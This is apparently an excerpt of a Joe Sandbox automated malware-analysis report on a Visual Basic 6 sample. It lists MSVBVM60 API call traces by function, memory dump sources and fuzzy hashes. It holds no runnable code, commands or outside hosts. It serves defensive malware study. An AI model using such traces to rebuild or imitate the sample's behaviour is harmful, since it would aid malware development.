                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D58
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D60
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D68
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 00414D8A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
                                                                                                                                                                                  • String ID: $&H68$&HA8$h#@
                                                                                                                                                                                  • API String ID: 3305104701-1988485601
                                                                                                                                                                                  • Opcode ID: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                                                  • Instruction ID: f198cd70f4d496bc7940f7355a5e4fe40ff025cce30350eb0c459dc764c5fff0
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8130C71D002289BCB25DF65DD88BDEBBB9FB48301F1081EAE50AA6250DE745F85CF64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
                                                                                                                                                                                  • Instruction ID: 082b4fd57fed1769b9006e205b6e9b322f4e6cb11cfcb06b4efda431eea04361
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
                                                                                                                                                                                  • Instruction Fuzzy Hash: 85014FA644E3D24FC31387344CA49917FB0AD2311534A02DBC581CB1A3E208994AD762
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 004156CA
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                                                  • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004157B7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000003), ref: 004157C8
                                                                                                                                                                                  • #616.MSVBVM60(00000000), ref: 004157CB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004157D6
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(?,00000000), ref: 004157DD
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004157FF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00415824
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000004,?), ref: 00415839
                                                                                                                                                                                  • #618.MSVBVM60(00000000), ref: 0041583C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00415847
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0041584A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000000), ref: 00415865
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00415879
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041588E
                                                                                                                                                                                  • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00415898
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00415855
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0040EB1A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0000,?), ref: 004158D0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004158DB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0000,?), ref: 004158EC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004158F7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00415907
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041590C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415915
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041591A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00415932
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415941
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041594D
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00415957
                                                                                                                                                                                  • #525.MSVBVM60(00001000), ref: 00415962
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041596D
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004159A3
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004159AC
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004159B4
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004159BD
                                                                                                                                                                                  • #525.MSVBVM60(?), ref: 004159E9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004159F4
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004159F9
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00415A02
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415A0A
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415A13
                                                                                                                                                                                  • #594.MSVBVM60(0000000A), ref: 00415A37
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415A40
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00415A5C
                                                                                                                                                                                  • #593.MSVBVM60(0000000A), ref: 00415A86
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415AAF
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415ABD
                                                                                                                                                                                  • __vbaFpUI1.MSVBVM60 ref: 00415ADF
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415AF7
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 00415B1F
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415B6D
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415B79
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • #593.MSVBVM60(0000000A), ref: 00415BB3
                                                                                                                                                                                  • __vbaFpI4.MSVBVM60 ref: 00415BD5
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415BE0
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 00415BF4
                                                                                                                                                                                  • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00415C0C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C17
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415C23
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C42
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00415C51
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C55
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415C5E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C63
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00415C6C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C70
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00415C73
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00415C7C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415CF5
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415CFA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415CFF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415D04
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00415D28
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                                                                                                                  • String ID: 0000
                                                                                                                                                                                  • API String ID: 292954213-211534962
                                                                                                                                                                                  • Opcode ID: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                                                  • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 00411D2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D5B
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 00411D6A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411D80
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D8B
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,004025E6), ref: 00411D9D
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411DB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411DBE
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 004156CA
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                                                    • Part of subcall function 00415660: #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                                                    • Part of subcall function 00415660: #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                                                    • Part of subcall function 00415660: #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6), ref: 00411DDF
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,00000006,00000006,?,00000000,?,00000000,004025E6), ref: 00411E04
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E0F
                                                                                                                                                                                  • #580.MSVBVM60(00000000,?,00000000,?,00000000,004025E6), ref: 00411E16
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E1F
                                                                                                                                                                                  • #598.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E2C
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004043C4,0041B024,0041B09C,?,00000000,?,00000000,004025E6), ref: 00411E5D
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E97
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 00411EB8
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0041B09C,00000000,?,00000020), ref: 00411EDE
                                                                                                                                                                                  • #598.MSVBVM60(?,00000000,004025E6), ref: 00411EEE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,004025E6), ref: 00411F10
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?,00000000,?,00000000,004025E6), ref: 00411F2C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 00411F37
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00000000,?,00000000,004025E6), ref: 00411F46
                                                                                                                                                                                  • #598.MSVBVM60(?,00000000,004025E6), ref: 00411F53
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411F72
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411F81
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?), ref: 00411F97
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(004123A7), ref: 00412397
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004123A0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                                                                                                                  • String ID: 5
                                                                                                                                                                                  • API String ID: 3012955283-2226203566
                                                                                                                                                                                  • Opcode ID: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                                                  • Instruction ID: b2978daf75234b14887ffa37483130b8305288e28cd3c1483e6757a63013c22d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9302E771900248EFDB04DFE0DE58BDEBBB5FB48305F108169E606B76A0DB781A85DB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,0040AA6C,0041B090), ref: 0040F1EE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040F21E
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                                                    • Part of subcall function 0040FA50: #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                                                    • Part of subcall function 0040FA50: #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                                                    • Part of subcall function 0040FA50: #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(0040AA6C,?,?,?,00000000,004025E6), ref: 0040F239
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F24D
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F256
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F267
                                                                                                                                                                                  • #712.MSVBVM60(00000000,0040728C,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F291
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F29C
                                                                                                                                                                                  • #712.MSVBVM60(00000000,00407294,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F2BD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F2C8
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2E2
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2FF
                                                                                                                                                                                  • #712.MSVBVM60(00000000,004072A0,004072B8,00000001,000000FF,00000000), ref: 0040F33A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040F345
                                                                                                                                                                                  • #712.MSVBVM60(00000000,004072AC,004072C0,00000001,000000FF,00000000), ref: 0040F366
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040F371
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001), ref: 0040F38B
